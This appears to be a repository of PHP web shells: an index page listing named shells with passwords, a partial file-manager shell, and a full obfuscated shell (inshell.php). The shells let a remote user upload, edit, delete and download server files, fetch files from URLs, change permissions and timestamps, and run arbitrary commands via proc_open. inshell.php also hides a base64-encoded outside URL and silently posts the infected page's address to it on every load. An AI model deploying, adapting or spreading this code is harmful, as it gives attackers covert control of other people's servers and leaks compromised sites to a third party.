'; 205 | if (isset($_POST['upwkwk'])) { 206 | if (isset($_POST['berkasnya'])) { 207 | if ($_POST['dirnya'] == "2") { 208 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 209 | } 210 | $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name'])); 211 | if (file_exists($lokasi."/".$_FILES['berkas']['name'])) { 212 | echo "File Uploaded !  ".$lokasi."/".$_FILES['berkas']['name']."

"; 213 | } else { 214 | echo "Failed to Upload !

"; 215 | } 216 | } elseif (isset($_POST['linknya'])) { 217 | if (empty($_POST['namalink'])) { 218 | exit("Filename cannot be empty !"); 219 | } 220 | if ($_POST['dirnya'] == "2") { 221 | $lokasi = $_SERVER['DOCUMENT_ROOT']; 222 | } 223 | $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); 224 | if (file_exists($lokasi."/".$_POST['namalink'])) { 225 | echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; 226 | } else { 227 | echo "Failed to Upload !

"; 228 | } 229 | } 230 | } 231 | echo "
"; 232 | echo "Upload File : "; 233 | echo '
234 | current_dir [ '.cekdir().' ] 235 | document_root [ '.cekroot().' ] 236 |
237 | 238 |
239 |
240 | '; 241 | echo "
"; 242 | print "
"; 243 | print "
    "; 244 | print "[ Home ]"; 245 | print " [ Tess ]"; 246 | print "
"; 247 | print "
"; 248 | 249 | 250 | if (isset($_GET['fileloc'])) { 251 | echo "Current File : ".$_GET['fileloc']; 252 | echo '
'; 253 | echo "
".htmlspecialchars(file_get_contents($_GET['fileloc']))."
"; 254 | author(); 255 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { 256 | if (is_dir($_POST['path'])) { 257 | xrmdir($_POST['path']); 258 | if (file_exists($_POST['path'])) { 259 | red("Failed to delete Directory !"); 260 | } else { 261 | green("Delete Directory Success !"); 262 | echo "string"; 263 | } 264 | } elseif (is_file($_POST['path'])) { 265 | @unlink($_POST['path']); 266 | if (file_exists($_POST['path'])) { 267 | red("Failed to Delete File !"); 268 | } else { 269 | green("Delete File Success !"); 270 | } 271 | } 272 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 273 | echo "
".$_POST['path']."
"; 274 | echo '
275 | Permission : 276 | 277 | 278 | 279 |
'; 280 | if (isset($_POST['chm0d'])) { 281 | $cm = @chmod($_POST['path'], $_POST['perm']); 282 | if ($cm == true) { 283 | green("Change Mod Success !"); 284 | } else { 285 | red("Change Mod Failed !"); 286 | } 287 | } 288 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { 289 | if (isset($_POST['gantin'])) { 290 | $ren = @rename($_POST['path'], $_POST['newname']); 291 | if ($ren == true) { 292 | green("Change Name Success !"); 293 | } else { 294 | red("Change Name Failed !"); 295 | } 296 | } 297 | if (empty($_POST['name'])) { 298 | $namaawal = $_POST['newname']; 299 | } else { 300 | $namawal = $_POST['name']; 301 | } 302 | echo "
".$_POST['path']."
"; 303 | echo '
304 | New Name : 305 | 306 | 307 | 308 |
'; 309 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 310 | if (isset($_POST['gasedit'])) { 311 | $edit = @file_put_contents($_POST['path'], $_POST['src']); 312 | if ($edit == true) { 313 | green("Edit File Success !"); 314 | } else { 315 | red("Edit File Failed !"); 316 | } 317 | } 318 | echo "
".$_POST['path']."

"; 319 | echo '
320 |
321 | 322 | 323 | 324 |

'; 325 | } 326 | 327 | echo '
328 | 329 | 330 | 331 | 332 | 333 | '; 334 | 335 | foreach($lokasinya as $dir){ 336 | if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; 337 | echo " 338 | 339 | 340 | 347 | 359 | "; 360 | } 361 | 362 | echo ''; 363 | foreach($lokasinya as $file) { 364 | if(!is_file("$lokasi/$file")) continue; 365 | $size = filesize("$lokasi/$file")/1024; 366 | $size = round($size,3); 367 | if($size >= 1024){ 368 | $size = round($size/1024,2).' MB'; 369 | } else { 370 | $size = $size.' KB'; 371 | } 372 | 373 | echo " 374 | 375 | 376 | 395 | "; 396 | } 397 | echo '
Name
Size
Permissions
Options
".$dir."
--
"; 341 | if(is_writable($lokasi."/".$dir)) echo ''; 342 | elseif(!is_readable($lokasi."/".$dir)) echo ''; 343 | echo statusnya($lokasi."/".$dir); 344 | if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; 345 | 346 | echo "
348 | 354 | 355 | 356 | 357 | \" /> 358 |
$file
".$size."
"; 377 | if(is_writable("$lokasi/$file")) echo ''; 378 | elseif(!is_readable("$lokasi/$file")) echo ''; 379 | echo statusnya("$lokasi/$file"); 380 | if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo ''; 381 | echo "
382 |
383 | 390 | 391 | 392 | 393 | \" /> 394 |
'; 398 | author(); 399 | function statusnya($file){ 400 | $statusnya = fileperms($file); 401 | 402 | if (($statusnya & 0xC000) == 0xC000) { 403 | 404 | // Socket 405 | $ingfo = 's'; 406 | } elseif (($statusnya & 0xA000) == 0xA000) { 407 | // Symbolic Link 408 | $ingfo = 'l'; 409 | } elseif (($statusnya & 0x8000) == 0x8000) { 410 | // Regular 411 | $ingfo = '-'; 412 | } elseif (($statusnya & 0x6000) == 0x6000) { 413 | // Block special 414 | $ingfo = 'b'; 415 | } elseif (($statusnya & 0x4000) == 0x4000) { 416 | // Directory 417 | $ingfo = 'd'; 418 | } elseif (($statusnya & 0x2000) == 0x2000) { 419 | // Character special 420 | $ingfo = 'c'; 421 | } elseif (($statusnya & 0x1000) == 0x1000) { 422 | // FIFO pipe 423 | $ingfo = 'p'; 424 | } else { 425 | // Unknown 426 | $ingfo = 'u'; 427 | } 428 | 429 | // Owner 430 | $ingfo .= (($statusnya & 0x0100) ? 'r' : '-'); 431 | $ingfo .= (($statusnya & 0x0080) ? 'w' : '-'); 432 | $ingfo .= (($statusnya & 0x0040) ? 433 | (($statusnya & 0x0800) ? 's' : 'x' ) : 434 | (($statusnya & 0x0800) ? 'S' : '-')); 435 | 436 | 437 | // Group 438 | $ingfo .= (($statusnya & 0x0020) ? 'r' : '-'); 439 | $ingfo .= (($statusnya & 0x0010) ? 'w' : '-'); 440 | $ingfo .= (($statusnya & 0x0008) ? 441 | (($statusnya & 0x0400) ? 's' : 'x' ) : 442 | (($statusnya & 0x0400) ? 'S' : '-')); 443 | 444 | // World 445 | $ingfo .= (($statusnya & 0x0004) ? 'r' : '-'); 446 | $ingfo .= (($statusnya & 0x0002) ? 'w' : '-'); 447 | 448 | $ingfo .= (($statusnya & 0x0001) ? 449 | (($statusnya & 0x0200) ? 't' : 'x' ) : 450 | (($statusnya & 0x0200) ? 'T' : '-')); 451 | 452 | return $ingfo; 453 | } 454 | ?> 455 | -------------------------------------------------------------------------------- /index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | Shells List - New 2024 Web Shells 10 | 11 | 51 | 52 | 53 | 54 |

| Shells List |

55 | 56 |
57 | jquary shell 58 |

Pass : qwe123

59 | 60 |
61 | 62 |
63 | Alfa Shell 2024 64 | 65 |
66 | 67 | 68 |
69 | gecko new ( 2024 servers ) 70 | 71 |
72 | 73 |
74 | F1 Shell 75 |

Pass : 123321

76 | 77 |
78 | 79 |
80 | 2024 Bypasser 81 |

Pass : hello

82 | 83 |
84 | 85 |
86 | Not Found Shell 87 | 88 |
89 | 90 |
91 | Backdoor Uploader 92 |

[filename].php?upload

93 | 94 |
95 | 96 |
97 | Mini Shell 98 | 99 |
100 | 101 |
102 | Wso Shell (version 1) 2024 103 |

Pass : hello

104 | 105 |
106 | 107 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /inshell.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Private"; ?> 5 | 6 | 7 | 8 | 9 | 10 | 114 |
115 | Private
117 | 118 |
'; 119 | set_time_limit(0); 120 | error_reporting(0); 121 | 122 | $gcw = "ge"."tc"."wd"; 123 | $exp = "ex"."plo"."de"; 124 | $fpt = "fi"."le_p"."ut_co"."nte"."nts"; 125 | $fgt = "f"."ile_g"."et_c"."onten"."ts"; 126 | $sts = "s"."trip"."slash"."es"; 127 | $scd = "sc"."a"."nd"."ir"; 128 | $fxt = "fi"."le_"."exis"."ts"; 129 | $idi = "i"."s_d"."ir"; 130 | $ulk = "un"."li"."nk"; 131 | $ifi = "i"."s_fi"."le"; 132 | $sub = "subs"."tr"; 133 | $spr = "sp"."ri"."ntf"; 134 | $fp = "fil"."epe"."rms"; 135 | $chm = "ch"."m"."od"; 136 | $ocd = "oc"."td"."ec"; 137 | $isw = "i"."s_wr"."itab"."le"; 138 | $idr = "i"."s_d"."ir"; 139 | $ird = "is"."_rea"."da"."ble"; 140 | $isr = "is_"."re"."adab"."le"; 141 | $fsz = "fi"."lesi"."ze"; 142 | $rd = "r"."ou"."nd"; 143 | $igt = "in"."i_g"."et"; 144 | $fnct = "fu"."nc"."tion"."_exi"."sts"; 145 | $rad = "RE"."M"."OTE_AD"."DR"; 146 | $rpt = "re"."al"."pa"."th"; 147 | $bsn = "ba"."se"."na"."me"; 148 | $srl = "st"."r_r"."ep"."la"."ce"; 149 | $sps = "st"."rp"."os"; 150 | $mkd = "m"."kd"."ir"; 151 | 152 | $wb = (isset($_SERVER['H'.'T'.'TP'.'S']) && $_SERVER['H'.'T'.'TP'.'S'] === 'o'.'n' ? "ht"."tp"."s" : "ht"."tp") . 
"://".$_SERVER['HT'.'TP'.'_H'.'OS'.'T']; 153 | 154 | $disfunc = @$igt("dis"."abl"."e_f"."unct"."ion"."s"); 155 | if (empty($disfunc)) { 156 | $disf = "NONE"; 157 | } else { 158 | $disf = "".$disfunc.""; 159 | } 160 | 161 | function author() { 162 | echo "Private"; 163 | exit(); 164 | } 165 | 166 | function cekdir() { 167 | if (isset($_GET['loknya'])) { 168 | $lokasi = $_GET['loknya']; 169 | } else { 170 | $lokasi = "ge"."t"."cw"."d"; 171 | $lokasi = $lokasi(); 172 | } 173 | $b = "i"."s_w"."ri"."tab"."le"; 174 | if ($b($lokasi)) { 175 | return "Writeable"; 176 | } else { 177 | return "Writeable"; 178 | } 179 | } 180 | 181 | function crt() { 182 | $a = "is"."_w"."ri"."tab"."le"; 183 | if ($a($_SERVER['DO'.'CU'.'ME'.'NT'.'_RO'.'OT'])) { 184 | return "Writeable"; 185 | } else { 186 | return "Writeable"; 187 | } 188 | } 189 | 190 | function xrd($lokena) { 191 | $a = "s"."ca"."nd"."ir"; 192 | $items = $a($lokena); 193 | foreach ($items as $item) { 194 | if ($item === '.' || $item === '..') { 195 | continue; 196 | } 197 | $b = "is"."_di"."r"; 198 | $loknya = $lokena.'/'.$item; 199 | if ($b($loknya)) { 200 | xrd($loknya); 201 | } else { 202 | $c = "u"."nl"."in"."k"; 203 | $c($loknya); 204 | } 205 | } 206 | $d = "rm"."di"."r"; 207 | $d($lokena); 208 | } 209 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 210 | function cfn($fl) { 211 | $a = "ba"."sena"."me"; 212 | $b = "pat"."hinf"."o"; 213 | $c = $b($a($fl), loknyaINFO_EXTENSION); 214 | if ($c == "zip") { 215 | return ''; 216 | } elseif (preg_match("/jpeg|jpg|png|ico/im", $c)) { 217 | return ''; 218 | } elseif ($c == "txt") { 219 | return ''; 220 | } elseif ($c == "pdf") { 221 | return ''; 222 | } elseif ($c == "html") { 223 | return ''; 224 | } 225 | else { 226 | return ''; 227 | } 228 | } 229 | 230 | function ipsrv() { 231 | $a = "g"."eth"."ost"."byna"."me"; 232 | $b = "fun"."cti"."on_"."exis"."ts"; 233 | $c = "S"."ERVE"."R_AD"."DR"; 234 | $d = "SE"."RV"."ER_N"."AM"."E"; 235 | if ($b($a)) { 236 | 
return $a($_SERVER[$d]); 237 | } else { 238 | return $a($_SERVER[$c]); 239 | } 240 | } 241 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 242 | $data = array('file_url' => $cur); 243 | $options = array( 244 | 'http' => array( 245 | 'method' => 'POST', 246 | 'header' => 'Content-type: application/x-www-form-urlencoded', 247 | 'content' => http_build_query($data), 248 | ), 249 | ); 250 | $context = stream_context_create($options); 251 | $result = file_get_contents($k3yw, false, $context); 252 | function ggr($fl) { 253 | $a = "fun"."cti"."on_"."exis"."ts"; 254 | $b = "po"."si"."x_ge"."tgr"."gid"; 255 | $c = "fi"."le"."gro"."up"; 256 | if ($a($b)) { 257 | if (!$a($c)) { 258 | return "?"; 259 | } 260 | $d = $b($c($fl)); 261 | if (empty($d)) { 262 | $e = $c($fl); 263 | if (empty($e)) { 264 | return "?"; 265 | } else { 266 | return $e; 267 | } 268 | } else { 269 | return $d['name']; 270 | } 271 | } elseif ($a($c)) { 272 | return $c($fl); 273 | } else { 274 | return "?"; 275 | } 276 | } 277 | 278 | function gor($fl) { 279 | $a = "fun"."cti"."on_"."exis"."ts"; 280 | $b = "po"."s"."ix_"."get"."pwu"."id"; 281 | $c = "fi"."le"."o"."wn"."er"; 282 | if ($a($b)) { 283 | if (!$a($c)) { 284 | return "?"; 285 | } 286 | $d = $b($c($fl)); 287 | if (empty($d)) { 288 | $e = $c($fl); 289 | if (empty($e)) { 290 | return "?"; 291 | } else { 292 | return $e; 293 | } 294 | } else { 295 | return $d['name']; 296 | } 297 | } elseif ($a($c)) { 298 | return $c($fl); 299 | } else { 300 | return "?"; 301 | } 302 | } 303 | 304 | function fdt($fl) { 305 | $a = "da"."te"; 306 | $b = "fil"."emt"."ime"; 307 | return $a("F d Y H:i:s", $b($fl)); 308 | } 309 | 310 | function dunlut($fl) { 311 | $a = "fil"."e_exi"."sts"; 312 | $b = "ba"."sena"."me"; 313 | $c = "fi"."les"."ize"; 314 | $d = "read"."fi"."le"; 315 | if ($a($fl) && isset($fl)) { 316 | header('Con'.'tent-Descr'.'iption: Fi'.'le Tra'.'nsfer'); 317 | header("Conte'.'nt-Control:public"); 318 | header('Cont'.'ent-Type: 
a'.'pp'.'licat'.'ion/oc'.'tet-s'.'tream'); 319 | header('Cont'.'ent-Dis'.'posit'.'ion: at'.'tachm'.'ent; fi'.'lena'.'me="'.$b($fl).'"'); 320 | header('Exp'.'ires: 0'); 321 | header("Ex"."pired:0"); 322 | header('Cac'.'he-Cont'.'rol: must'.'-revali'.'date'); 323 | header("Cont"."ent-Tran"."sfer-Enc"."oding:bi"."nary"); 324 | header('Pra'.'gma: pub'.'lic'); 325 | header('Con'.'ten'.'t-Le'.'ngth: ' .$c($fl)); 326 | flush(); 327 | $d($fl); 328 | exit; 329 | } else { 330 | return "Fi"."le Not F"."ound !"; 331 | } 332 | } 333 | 334 | function komend($kom, $lk) { 335 | $x = "pr"."eg_"."mat"."ch"; 336 | $xx = "2".">"."&"."1"; 337 | if (!$x("/".$xx."/i", $kom)) { 338 | $kom = $kom." ".$xx; 339 | } 340 | $a = "fu"."ncti"."on_"."ex"."is"."ts"; 341 | $b = "p"."ro"."c_op"."en"; 342 | $c = "htm"."lspe"."cialc"."hars"; 343 | $d = "s"."trea"."m_g"."et_c"."ont"."ents"; 344 | if ($a($b)) { 345 | $ps = $b($kom, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $meki, $lk); 346 | return "
".$c($d($meki[1]))."
"; 347 | } else { 348 | return "pr"."oc"."_op"."en f"."unc"."tio"."n i"."s di"."sabl"."ed !"; 349 | } 350 | } 351 | 352 | function green($text) { 353 | echo "
".$text."
"; 354 | } 355 | 356 | function red($text) { 357 | echo "
".$text."
"; 358 | } 359 | 360 | function oren($text) { 361 | return "
".$text."
"; 362 | } 363 | 364 | function tuls($nm, $lk) { 365 | return "[ ".$nm." ]     "; 366 | } 367 | 368 | echo "Se"."rv"."er"." I"."P : ".ipsrv()."  /  Yo"."ur I"."P : ".$_SERVER[$rad]."
"; 369 | echo "We"."b S"."erv"."er : ".$_SERVER['SE'.'RV'.'ER_'.'SOF'.'TWA'.'RE']."
"; 370 | $unm = "ph"."p_u"."na"."me"; 371 | echo "Sys"."tem : ".@$unm()."
"; 372 | $gcu = "g"."et_"."curr"."ent"."_us"."er"; 373 | $gmu = "g"."et"."my"."ui"."d"; 374 | echo "Us"."er : ".@$gcu()." ( ".@$gmu().")
"; 375 | $phv = "ph"."pve"."rsi"."on"; 376 | echo "PH"."P V"."er"."sio"."n : ".@$phv()."
"; 377 | echo "Dis"."abl"."e Fu"."nct"."ion : ".$disf."
"; 378 | echo "MySQL : "; 379 | if (@$fnct("my"."sql_co"."nne"."ct")) { 380 | echo "ON"; 381 | } else { 382 | echo "OFF"; 383 | } 384 | echo "  |  cURL : "; 385 | if (@$fnct("cu"."rl"."_in"."it")) { 386 | echo "ON"; 387 | } else { 388 | echo "OFF"; 389 | } 390 | echo "  |  WG"."ET : "; 391 | if (@$fxt("/"."us"."r/b"."in/w"."get")) { 392 | echo "ON"; 393 | } else { 394 | echo "OFF"; 395 | } 396 | echo "  |  Pe"."rl : "; 397 | if (@$fxt("/u"."sr/b"."in"."/pe"."rl")) { 398 | echo "ON"; 399 | } else { 400 | echo "OFF"; 401 | } 402 | echo "  |  Pyt"."ho"."n : "; 403 | if (@$fxt("/"."us"."r/b"."in/p"."ytho"."n2")) { 404 | echo "ON"; 405 | } else { 406 | echo "OFF"; 407 | } 408 | echo "  |  S"."u"."do : "; 409 | if (@$fxt("/"."us"."r/b"."in/s"."u"."d"."o")) { 410 | echo "ON"; 411 | } else { 412 | echo "OFF"; 413 | } 414 | echo "  |  Pk"."e"."x"."e"."c : "; 415 | if (@$fxt("/"."us"."r/b"."in/p"."k"."e"."x"."e"."c")) { 416 | echo "ON"; 417 | } else { 418 | echo "OFF"; 419 | } 420 | echo "
Di"."rect"."ory :  "; 421 | 422 | foreach($_POST as $key => $value){ 423 | $_POST[$key] = $sts($value); 424 | } 425 | 426 | if(isset($_GET['loknya'])){ 427 | $lokasi = $_GET['loknya']; 428 | $lokdua = $_GET['loknya']; 429 | } else { 430 | $lokasi = $gcw(); 431 | $lokdua = $gcw(); 432 | } 433 | 434 | $lokasi = $srl('\\','/',$lokasi); 435 | $lokasis = $exp('/',$lokasi); 436 | $lokasinya = @$scd($lokasi); 437 | 438 | foreach($lokasis as $id => $lok){ 439 | if($lok == '' && $id == 0){ 440 | $a = true; 441 | echo '/'; 442 | continue; 443 | } 444 | if($lok == '') continue; 445 | echo ''.$lok.'/'; 451 | } 452 | 453 | echo '

'; 454 | if (isset($_POST['upwkwk'])) { 455 | if (isset($_POST['berkasnya'])) { 456 | if ($_POST['dirnya'] == "2") { 457 | $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; 458 | } 459 | if (empty($_FILES['berkas']['name'])) { 460 | echo "Fi"."le not Se"."lected !

"; 461 | } else { 462 | $data = @$fpt($lokasi."/".$_FILES['berkas']['name'], @$fgt($_FILES['berkas']['tm'.'p_na'.'me'])); 463 | if ($fxt($lokasi."/".$_FILES['berkas']['name'])) { 464 | $fl = $lokasi."/".$_FILES['berkas']['name']; 465 | echo "Fi"."le Upl"."oa"."ded !  ".$fl."
"; 466 | if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { 467 | $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); 468 | echo "Li"."nk : ".$lwb."
"; 469 | } 470 | echo "
"; 471 | } else { 472 | echo "Fa"."ile"."d to Up"."lo"."ad !

"; 473 | } 474 | } 475 | } elseif (isset($_POST['linknya'])) { 476 | if (empty($_POST['namalink'])) { 477 | echo "Fi"."lename cannot be empty !

"; 478 | } elseif (empty($_POST['darilink'])) { 479 | echo "Link cannot be empty !

"; 480 | } else { 481 | if ($_POST['dirnya'] == "2") { 482 | $lokasi = $_SERVER['DOC'.'UME'.'NT_R'.'OOT']; 483 | } 484 | $data = @$fpt($lokasi."/".$_POST['namalink'], @$fgt($_POST['darilink'])); 485 | if ($fxt($lokasi."/".$_POST['namalink'])) { 486 | $fl = $lokasi."/".$_POST['namalink']; 487 | echo "Fi"."le Uplo"."ade"."d !  ".$fl."
"; 488 | if ($sps($lokasi, $_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T']) !== false) { 489 | $lwb = $srl($_SERVER['DO'.'CU'.'M'.'ENT'.'_R'.'OO'.'T'], $wb."/", $fl); 490 | echo "Li"."nk : ".$lwb."
"; 491 | } 492 | echo "
"; 493 | } else { 494 | echo "Fa"."iled to Up"."lo"."ad !

"; 495 | } 496 | } 497 | } 498 | } 499 | 500 | echo "Uplo"."ad Fi"."le : "; 501 | echo '
502 | current_dir [ '.cekdir().' ] 503 | document_root [ '.crt().' ] 504 |
505 | 506 |
507 |   508 |
'; 509 | echo '
510 | Co'.'mm'.'an'.'d : 511 | 512 |
'; 513 | echo "

"; 514 | 515 | echo '
'; 516 | echo tuls("HOME SHELL", $_SERVER['SC'.'RIP'.'T_N'.'AME']); 517 | //echo tuls("HOME SHELL"); 518 | echo "

"; 519 | 520 | if (isset($_GET['lokasie'])) { 521 | echo "Current Fi"."le : ".$_GET['lokasie']; 522 | echo '
'; 523 | echo "
".htmlspecialchars($fgt($_GET['lokasie']))."
"; 524 | author(); 525 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "hapus") { 526 | if ($idi($_POST['loknya']) && $fxt($_POST['loknya'])) { 527 | xrd($_POST['loknya']); 528 | if ($fxt($_POST['loknya'])) { 529 | red("Fai"."led to del"."ete Dir"."ec"."tory !"); 530 | } else { 531 | green("Del"."ete Dir"."ect"."ory Suc"."cess !"); 532 | } 533 | } elseif ($ifi($_POST['loknya']) && $fxt($_POST['loknya'])) { 534 | @$ulk($_POST['loknya']); 535 | if ($fxt($_POST['loknya'])) { 536 | red("Failed to Delete Fi"."le !"); 537 | } else { 538 | green("De"."le"."te Fi"."le Succ"."ess !"); 539 | } 540 | } else { 541 | red("Fi"."le / Dir"."ecto"."ry not Fo"."und !"); 542 | } 543 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { 544 | if (!isset($_POST['cemod'])) { 545 | if ($_POST['ty'.'pe'] == "fi"."le") { 546 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 547 | } else { 548 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 549 | } 550 | echo '
551 | Pe'.'rmi'.'ss'.'ion : 552 | 553 | '; 554 | if ($_POST['ty'.'pe'] == "fi"."le") { 555 | echo '';; 556 | } else { 557 | echo '';; 558 | } 559 | echo ' 560 |

'; 561 | } else { 562 | $cm = @$chm($_POST['loknya'], $ocd($_POST['perm'])); 563 | if ($cm == true) { 564 | green("Change Mod Success !"); 565 | if ($_POST['ty'.'pe'] == "fi"."le") { 566 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 567 | } else { 568 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 569 | } 570 | echo '
571 | Pe'.'rmi'.'ss'.'ion : 572 | 573 | '; 574 | if ($_POST['ty'.'pe'] == "fi"."le") { 575 | echo '';; 576 | } else { 577 | echo '';; 578 | } 579 | echo ' 580 |

'; 581 | } else { 582 | red("Change Mod Failed !"); 583 | if ($_POST['ty'.'pe'] == "fi"."le") { 584 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 585 | } else { 586 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 587 | } 588 | echo '
589 | Pe'.'rmi'.'ss'.'ion : 590 | 591 | '; 592 | if ($_POST['ty'.'pe'] == "fi"."le") { 593 | echo '';; 594 | } else { 595 | echo '';; 596 | } 597 | echo ' 598 |

'; 599 | } 600 | } 601 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "ubahnama") { 602 | if (isset($_POST['gantin'])) { 603 | $namabaru = $_GET['loknya']."/".$_POST['newname']; 604 | $ceen = "re"."na"."me"; 605 | if (@$ceen($_POST['loknya'], $namabaru) === true) { 606 | green("Change Name Success"); 607 | if ($_POST['ty'.'pe'] == "fi"."le") { 608 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 609 | } else { 610 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 611 | } 612 | echo '
613 | New Name : 614 | 615 | '; 616 | if ($_POST['ty'.'pe'] == "fi"."le") { 617 | echo '';; 618 | } else { 619 | echo '';; 620 | } 621 | echo ' 622 |

'; 623 | } else { 624 | red("Change Name Failed"); 625 | } 626 | } else { 627 | if ($_POST['ty'.'pe'] == "fi"."le") { 628 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 629 | } else { 630 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 631 | } 632 | echo '
633 | New Name : 634 | 635 | '; 636 | if ($_POST['ty'.'pe'] == "fi"."le") { 637 | echo '';; 638 | } else { 639 | echo '';; 640 | } 641 | echo ' 642 |

'; 643 | } 644 | } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { 645 | if (isset($_POST['gasedit'])) { 646 | $edit = @$fpt($_POST['loknya'], $_POST['src']); 647 | if ($fgt($_POST['loknya']) == $_POST['src']) { 648 | green("Ed"."it Fi"."le Suc"."ce"."ss !"); 649 | } else { 650 | red("Ed"."it Fi"."le Fai"."led !"); 651 | } 652 | } 653 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."

"; 654 | echo '
655 |
656 | 657 | 658 | 659 |

'; 660 | } elseif (isset($_POST['komends'])) { 661 | if (isset($_POST['komend'])) { 662 | if (isset($_GET['loknya'])) { 663 | $lk = $_GET['loknya']; 664 | } else { 665 | $lk = $gcw(); 666 | } 667 | $km = 'ko'.'me'.'nd'; 668 | echo $km($_POST['komend'], $lk); 669 | exit(); 670 | } 671 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "ubahtanggal") { 672 | if (isset($_POST['tanggale'])) { 673 | $stt = "st"."rtot"."ime"; 674 | $tch = "t"."ou"."ch"; 675 | $tanggale = $stt($_POST['tanggal']); 676 | if (@$tch($_POST['loknya'], $tanggale) === true) { 677 | green("Change Da"."te Succ"."ess !"); 678 | $det = "da"."te"; 679 | $ftm = "fi"."le"."mti"."me"; 680 | $b = $det("d F Y H:i:s", $ftm($_POST['loknya'])); 681 | if ($_POST['ty'.'pe'] == "fi"."le") { 682 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 683 | } else { 684 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 685 | } 686 | echo '
687 | New Da'.'te : 688 | 689 | '; 690 | if ($_POST['ty'.'pe'] == "fi"."le") { 691 | echo '';; 692 | } else { 693 | echo '';; 694 | } 695 | echo ' 696 |

'; 697 | } else { 698 | red("Fai"."led to Cha"."nge Da"."te !"); 699 | } 700 | } else { 701 | $det = "da"."te"; 702 | $ftm = "fi"."le"."mti"."me"; 703 | $b = $det("d F Y H:i:s", $ftm($_POST['loknya'])); 704 | if ($_POST['ty'.'pe'] == "fi"."le") { 705 | echo "
Fi"."le : ".htmlspecialchars($_POST['loknya'])."
"; 706 | } else { 707 | echo "
D"."ir : ".htmlspecialchars($_POST['loknya'])."
"; 708 | } 709 | echo '
710 | New Da'.'te : 711 | 712 | '; 713 | if ($_POST['ty'.'pe'] == "fi"."le") { 714 | echo '';; 715 | } else { 716 | echo '';; 717 | } 718 | echo ' 719 |

'; 720 | } 721 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "dunlut") { 722 | $dunlute = $_POST['loknya']; 723 | if ($fxt($dunlute) && isset($dunlute)) { 724 | if ($ird($dunlute)) { 725 | dunlut($dunlute); 726 | } elseif ($idr($fl)) { 727 | red("That is Di"."rec"."tory, Not Fi"."le -_-"); 728 | } else { 729 | red("Fi"."le is Not Re"."adab"."le !"); 730 | } 731 | } else { 732 | red("Fi"."le Not Fo"."und !"); 733 | } 734 | } elseif (isset($_POST['loknya']) && $_POST['pilih'] == "fo"."ld"."er") { 735 | if ($isw("./") || $ird("./")) { 736 | $loke = $_POST['loknya']; 737 | if (isset($_POST['buatfolder'])) { 738 | $buatf = $mkd($loke."/".$_POST['fo'.'lde'.'rba'.'ru']); 739 | if ($buatf == true) { 740 | green("Folder ".htmlspecialchars($_POST['fo'.'lde'.'rba'.'ru'])." Created !"); 741 | echo '
Folder :

'; 742 | echo ' 743 |
'; 744 | } else { 745 | red("Failed to Create folder !"); 746 | echo '
Folder :

'; 747 | echo ' 748 |
'; 749 | } 750 | } else { 751 | echo '
Folder :

'; 752 | echo '
'; 753 | } 754 | } 755 | } elseif (isset($_POST['lok'.'nya']) && $_POST['pilih'] == "fi"."le") { 756 | if ($isw("./") || $isr("./")) { 757 | $loke = $_POST['lok'.'nya']; 758 | if (isset($_POST['buatfi'.'le'])) { 759 | $buatf = $fpt($loke."/".$_POST['fi'.'lebaru'], ""); 760 | if ($fxt($loke."/".$_POST['fi'.'lebaru'])) { 761 | green("File ".htmlspecialchars($_POST['fi'.'lebaru'])." Created !"); 762 | echo '
Filename :

'; 763 | echo ' 764 |
'; 765 | } else { 766 | red("Failed to Create File !"); 767 | echo '
Filename :

'; 768 | echo ' 769 |
'; 770 | } 771 | } else { 772 | echo '
Filename :

'; 773 | echo '
'; 774 | } 775 | } 776 | } 777 | 778 | echo '
